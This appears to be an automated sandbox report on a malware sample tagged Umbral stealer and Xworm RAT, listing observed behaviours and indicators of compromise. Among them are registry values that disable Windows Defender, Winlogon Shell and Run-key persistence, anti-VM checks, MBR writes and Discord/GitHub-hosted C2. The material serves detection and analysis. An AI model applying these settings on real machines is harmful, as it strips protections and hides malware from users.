umbral | 35a2a6f94f05c505f822208734c2d31fb69aede9f963103855b4721585290605

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Windows\\Offline Web Pages\\WmiPrvSE.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\HypercomponentCommon\\InstallAgent.exe\", \"C:\\Recovery\\WindowsRE\\lsass.exe\", \"C:\\HypercomponentCommon\\hyperSurrogateagentCrt.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Windows\\Offline Web Pages\\WmiPrvSE.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Windows\\Offline Web Pages\\WmiPrvSE.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Windows\\Offline Web Pages\\WmiPrvSE.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\HypercomponentCommon\\InstallAgent.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Windows\\Offline Web Pages\\WmiPrvSE.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\HypercomponentCommon\\InstallAgent.exe\", \"C:\\Recovery\\WindowsRE\\lsass.exe\""	hyperSurrogateagentCrt.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

Windows Service

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1040	1108	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3804	1108	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2904	1108	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4628	1108	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2764	1108	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4204	1108	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	488	1108	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3356	1108	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4356	1108	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	312	1108	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1504	1108	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3848	1108	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	672	1108	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2348	1108	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1940	1108	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3708	1108	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3048	1108	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4444	1108	schtasks.exe	100

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	system32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Microsoft OneDrive.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	XClient.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3564	powershell.exe
64	powershell.exe
832	powershell.exe
4140	powershell.exe
4088	powershell.exe
3048	powershell.exe
4852	powershell.exe
3712	powershell.exe
4396	powershell.exe
4444	powershell.exe
4392	powershell.exe
2572	powershell.exe
4980	powershell.exe
1120	powershell.exe
2328	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	system32.exe

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	system32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	system32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Microsoft OneDrive.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Microsoft OneDrive.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	XClient.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	XClient.exe

Drops startup file 6 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft OneDrive.lnk	Microsoft OneDrive.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HPN42SDD8UHTLWI.lnk	HPN42SDD8UHTLWI.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HPN42SDD8UHTLWI.lnk	HPN42SDD8UHTLWI.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FunCheker.lnk	XClient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FunCheker.lnk	XClient.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft OneDrive.lnk	Microsoft OneDrive.exe

Executes dropped EXE 7 IoCs

pid	Process
2660	system32.exe
2992	Microsoft OneDrive.exe
4016	XClient.exe
4424	HPN42SDD8UHTLWI.exe
4912	33WHFCVS57NXGIT.exe
664	hyperSurrogateagentCrt.exe
2044	dwm.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Wine	Microsoft OneDrive.exe
Key opened	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Wine	XClient.exe
Key opened	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Wine	system32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral2/memory/4228-1-0x00000000004B0000-0x000000000190C000-memory.dmp	vmprotect

Adds Run key to start application 2 TTPs 15 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft OneDrive = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft OneDrive.exe"	Microsoft OneDrive.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\WindowsRE\\dwm.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\hyperSurrogateagentCrt = "\"C:\\HypercomponentCommon\\hyperSurrogateagentCrt.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\InstallAgent = "\"C:\\HypercomponentCommon\\InstallAgent.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\WindowsRE\\lsass.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\Offline Web Pages\\WmiPrvSE.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\WindowsRE\\dwm.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\InstallAgent = "\"C:\\HypercomponentCommon\\InstallAgent.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\WindowsRE\\lsass.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hyperSurrogateagentCrt = "\"C:\\HypercomponentCommon\\hyperSurrogateagentCrt.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\FunCheker = "C:\\Users\\Admin\\AppData\\Roaming\\FunCheker.exe"	XClient.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\HPN42SDD8UHTLWI = "C:\\Users\\Admin\\AppData\\Roaming\\HPN42SDD8UHTLWI.exe"	HPN42SDD8UHTLWI.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\Offline Web Pages\\WmiPrvSE.exe\""	hyperSurrogateagentCrt.exe

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Microsoft OneDrive.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	system32.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	XClient.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
11	discord.com
12	discord.com
24	raw.githubusercontent.com
25	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com
9	ip-api.com

Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	system32.exe
File opened for modification	\??\PhysicalDrive0	Microsoft OneDrive.exe
File opened for modification	\??\PhysicalDrive0	XClient.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	\??\c:\Windows\System32\CSC9F2BFC5A824449828879E6BA61F831F8.TMP	csc.exe
File created	\??\c:\Windows\System32\p6rbzy.exe	csc.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
2660	system32.exe
2992	Microsoft OneDrive.exe
4016	XClient.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe
File created	C:\Windows\Offline Web Pages\WmiPrvSE.exe	hyperSurrogateagentCrt.exe
File created	C:\Windows\Offline Web Pages\24dbde2999530e	hyperSurrogateagentCrt.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

pid	Process
4972	wmic.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings	33WHFCVS57NXGIT.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings	hyperSurrogateagentCrt.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1940	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 21 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4204	schtasks.exe
3848	schtasks.exe
1940	schtasks.exe
2904	schtasks.exe
2764	schtasks.exe
1040	schtasks.exe
488	schtasks.exe
312	schtasks.exe
2348	schtasks.exe
3048	schtasks.exe
664	schtasks.exe
2000	schtasks.exe
1504	schtasks.exe
672	schtasks.exe
3708	schtasks.exe
4444	schtasks.exe
3684	schtasks.exe
4628	schtasks.exe
4356	schtasks.exe
3804	schtasks.exe
3356	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2660	system32.exe
2660	system32.exe
2992	Microsoft OneDrive.exe
2992	Microsoft OneDrive.exe
4016	XClient.exe
4016	XClient.exe
3048	powershell.exe
3048	powershell.exe
3048	powershell.exe
4444	powershell.exe
4444	powershell.exe
3564	powershell.exe
3564	powershell.exe
4444	powershell.exe
3564	powershell.exe
3564	powershell.exe
4444	powershell.exe
1676	powershell.exe
1676	powershell.exe
1676	powershell.exe
1676	powershell.exe
1120	powershell.exe
1120	powershell.exe
64	powershell.exe
64	powershell.exe
1120	powershell.exe
64	powershell.exe
1120	powershell.exe
64	powershell.exe
4404	powershell.exe
4852	powershell.exe
4852	powershell.exe
4404	powershell.exe
4404	powershell.exe
3712	powershell.exe
3712	powershell.exe
4852	powershell.exe
4404	powershell.exe
3712	powershell.exe
4852	powershell.exe
3712	powershell.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4356	powershell.exe
4356	powershell.exe
832	powershell.exe
832	powershell.exe
4356	powershell.exe
4964	taskmgr.exe
832	powershell.exe
4356	powershell.exe
4392	powershell.exe
4392	powershell.exe
832	powershell.exe
4392	powershell.exe
4964	taskmgr.exe
4392	powershell.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4016	XClient.exe
2992	Microsoft OneDrive.exe
4116	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2660	system32.exe
Token: SeDebugPrivilege	2992	Microsoft OneDrive.exe
Token: SeDebugPrivilege	4016	XClient.exe
Token: SeDebugPrivilege	3048	powershell.exe
Token: SeDebugPrivilege	4444	powershell.exe
Token: SeDebugPrivilege	3564	powershell.exe
Token: SeDebugPrivilege	1676	powershell.exe
Token: SeDebugPrivilege	1120	powershell.exe
Token: SeDebugPrivilege	64	powershell.exe
Token: SeDebugPrivilege	4404	powershell.exe
Token: SeDebugPrivilege	4852	powershell.exe
Token: SeDebugPrivilege	3712	powershell.exe
Token: SeDebugPrivilege	4964	taskmgr.exe
Token: SeSystemProfilePrivilege	4964	taskmgr.exe
Token: SeCreateGlobalPrivilege	4964	taskmgr.exe
Token: SeDebugPrivilege	4356	powershell.exe
Token: SeDebugPrivilege	832	powershell.exe
Token: SeDebugPrivilege	4392	powershell.exe
Token: SeIncreaseQuotaPrivilege	4332	wmic.exe
Token: SeSecurityPrivilege	4332	wmic.exe
Token: SeTakeOwnershipPrivilege	4332	wmic.exe
Token: SeLoadDriverPrivilege	4332	wmic.exe
Token: SeSystemProfilePrivilege	4332	wmic.exe
Token: SeSystemtimePrivilege	4332	wmic.exe
Token: SeProfSingleProcessPrivilege	4332	wmic.exe
Token: SeIncBasePriorityPrivilege	4332	wmic.exe
Token: SeCreatePagefilePrivilege	4332	wmic.exe
Token: SeBackupPrivilege	4332	wmic.exe
Token: SeRestorePrivilege	4332	wmic.exe
Token: SeShutdownPrivilege	4332	wmic.exe
Token: SeDebugPrivilege	4332	wmic.exe
Token: SeSystemEnvironmentPrivilege	4332	wmic.exe
Token: SeRemoteShutdownPrivilege	4332	wmic.exe
Token: SeUndockPrivilege	4332	wmic.exe
Token: SeManageVolumePrivilege	4332	wmic.exe
Token: 33	4332	wmic.exe
Token: 34	4332	wmic.exe
Token: 35	4332	wmic.exe
Token: 36	4332	wmic.exe
Token: SeIncreaseQuotaPrivilege	4332	wmic.exe
Token: SeSecurityPrivilege	4332	wmic.exe
Token: SeTakeOwnershipPrivilege	4332	wmic.exe
Token: SeLoadDriverPrivilege	4332	wmic.exe
Token: SeSystemProfilePrivilege	4332	wmic.exe
Token: SeSystemtimePrivilege	4332	wmic.exe
Token: SeProfSingleProcessPrivilege	4332	wmic.exe
Token: SeIncBasePriorityPrivilege	4332	wmic.exe
Token: SeCreatePagefilePrivilege	4332	wmic.exe
Token: SeBackupPrivilege	4332	wmic.exe
Token: SeRestorePrivilege	4332	wmic.exe
Token: SeShutdownPrivilege	4332	wmic.exe
Token: SeDebugPrivilege	4332	wmic.exe
Token: SeSystemEnvironmentPrivilege	4332	wmic.exe
Token: SeRemoteShutdownPrivilege	4332	wmic.exe
Token: SeUndockPrivilege	4332	wmic.exe
Token: SeManageVolumePrivilege	4332	wmic.exe
Token: 33	4332	wmic.exe
Token: 34	4332	wmic.exe
Token: 35	4332	wmic.exe
Token: 36	4332	wmic.exe
Token: SeIncreaseQuotaPrivilege	4528	wmic.exe
Token: SeSecurityPrivilege	4528	wmic.exe
Token: SeTakeOwnershipPrivilege	4528	wmic.exe
Token: SeLoadDriverPrivilege	4528	wmic.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe
4964	taskmgr.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4016	XClient.exe
2992	Microsoft OneDrive.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4228 wrote to memory of 3684	4228	FunChecker.exe	73
PID 4228 wrote to memory of 3684	4228	FunChecker.exe	73
PID 4228 wrote to memory of 2348	4228	FunChecker.exe	75
PID 4228 wrote to memory of 2348	4228	FunChecker.exe	75
PID 4228 wrote to memory of 2332	4228	FunChecker.exe	77
PID 4228 wrote to memory of 2332	4228	FunChecker.exe	77
PID 4228 wrote to memory of 428	4228	FunChecker.exe	78
PID 4228 wrote to memory of 428	4228	FunChecker.exe	78
PID 4228 wrote to memory of 2660	4228	FunChecker.exe	81
PID 4228 wrote to memory of 2660	4228	FunChecker.exe	81
PID 4228 wrote to memory of 2660	4228	FunChecker.exe	81
PID 4228 wrote to memory of 2992	4228	FunChecker.exe	82
PID 4228 wrote to memory of 2992	4228	FunChecker.exe	82
PID 4228 wrote to memory of 2992	4228	FunChecker.exe	82
PID 4228 wrote to memory of 4016	4228	FunChecker.exe	83
PID 4228 wrote to memory of 4016	4228	FunChecker.exe	83
PID 4228 wrote to memory of 4016	4228	FunChecker.exe	83
PID 428 wrote to memory of 2968	428	cmd.exe	84
PID 428 wrote to memory of 2968	428	cmd.exe	84
PID 3684 wrote to memory of 1676	3684	cmd.exe	122
PID 3684 wrote to memory of 1676	3684	cmd.exe	122
PID 3684 wrote to memory of 600	3684	cmd.exe	86
PID 3684 wrote to memory of 600	3684	cmd.exe	86
PID 3684 wrote to memory of 2172	3684	cmd.exe	87
PID 3684 wrote to memory of 2172	3684	cmd.exe	87
PID 2660 wrote to memory of 3048	2660	system32.exe	88
PID 2660 wrote to memory of 3048	2660	system32.exe	88
PID 2660 wrote to memory of 3048	2660	system32.exe	88
PID 3684 wrote to memory of 3348	3684	cmd.exe	90
PID 3684 wrote to memory of 3348	3684	cmd.exe	90
PID 3684 wrote to memory of 4868	3684	cmd.exe	91
PID 3684 wrote to memory of 4868	3684	cmd.exe	91
PID 3684 wrote to memory of 424	3684	cmd.exe	92
PID 3684 wrote to memory of 424	3684	cmd.exe	92
PID 3684 wrote to memory of 2972	3684	cmd.exe	93
PID 3684 wrote to memory of 2972	3684	cmd.exe	93
PID 3684 wrote to memory of 508	3684	cmd.exe	94
PID 3684 wrote to memory of 508	3684	cmd.exe	94
PID 3684 wrote to memory of 2216	3684	cmd.exe	95
PID 3684 wrote to memory of 2216	3684	cmd.exe	95
PID 3684 wrote to memory of 1912	3684	cmd.exe	96
PID 3684 wrote to memory of 1912	3684	cmd.exe	96
PID 3684 wrote to memory of 1936	3684	cmd.exe	97
PID 3684 wrote to memory of 1936	3684	cmd.exe	97
PID 3684 wrote to memory of 4404	3684	cmd.exe	128
PID 3684 wrote to memory of 4404	3684	cmd.exe	128
PID 3684 wrote to memory of 524	3684	cmd.exe	99
PID 3684 wrote to memory of 524	3684	cmd.exe	99
PID 3684 wrote to memory of 2760	3684	cmd.exe	101
PID 3684 wrote to memory of 2760	3684	cmd.exe	101
PID 3684 wrote to memory of 2108	3684	cmd.exe	102
PID 3684 wrote to memory of 2108	3684	cmd.exe	102
